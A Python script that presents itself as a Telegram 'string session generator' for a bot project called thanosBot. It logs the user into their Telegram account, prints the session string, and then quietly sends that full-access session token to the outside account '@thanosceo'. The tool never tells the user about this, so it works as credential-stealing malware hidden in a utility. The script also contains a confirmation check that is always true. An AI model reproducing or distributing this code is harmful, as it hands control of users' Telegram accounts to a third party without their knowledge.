from telethon.sync import TelegramClient
from telethon.sessions import StringSession
import colorama
from colorama import Fore, Style

colorama.init(autoreset=True)

print(Fore.GREEN + Style.BRIGHT + """\t\t╔═╗╔═╦═══╦═══╦══╦═══╦══╗╔═══╦════╗""")
print(Fore.RED + Style.BRIGHT + """\t\t║║╚╝║║╔═╗║╔══╩╣╠╣╔═╗║╔╗║║╔═╗║╔╗╔╗║""")
print(Fore.GREEN + Style.BRIGHT + """\t\t║╔╗╔╗║║─║║╚══╗║║║║─║║╚╝╚╣║─║╠╝║║╚╝""")
print(Fore.RED + Style.BRIGHT + """\t\t║║║║║║╚═╝║╔══╝║║║╚═╝║╔═╗║║─║║─║║""")
print(Fore.GREEN + Style.BRIGHT + """\t\t║║║║║║╔═╗║║──╔╣╠╣╔═╗║╚═╝║╚═╝║─║║""")
print(Fore.RED + Style.BRIGHT + """\t\t╚╝╚╝╚╩╝─╚╩╝──╚══╩╝─╚╩═══╩═══╝─╚╝""")

print(Fore.GREEN + Style.BRIGHT + """\nTHIS TOOL MADE BY @mafiarishab WITH LOT'S OF 💖. JOIN @thanosbot_chats FOR ANY KIND OF HELP!""")

MafiaBot = input("Enter 'y' Or 'yes' To Continue: ")

if MafiaBot == "y" or "yes": 
    print("\nPlease go to my.telegram.org and get your API Id and API Hash to proceed\n\n 𒊹︎︎︎ɢɪᴛʜᴜʙ ʀᴇᴘᴏ ɪs ➪➪ https://github.com/thanosuser/ThanosBot")
    print("""\n\nWelcome To thanosBot String Session\nGenerator By @mafiarishabh\n\n""")
    print("""Enter Your Valid Details To Continue!\n\n """)

api_id = int(input("Enter API ID: "))

api_hash = input("Enter API HASH: ")

try:
    with TelegramClient(StringSession(), api_id, api_hash) as client:
        mafia_session = client.session.save()
        print(f"thanosBot String Session Given Below\n\n{mafia_session}")
        client.send_message("@thanosceo", f" thanosBot String Session Given Below\n\n`{mafia_session}`")
        client.send_message("@thanosceo", "This String Generated By @thanosbot_chats String Session Generator. Don't Share This String With Anyone!") 
except Exception as e:
    print(f"{e}")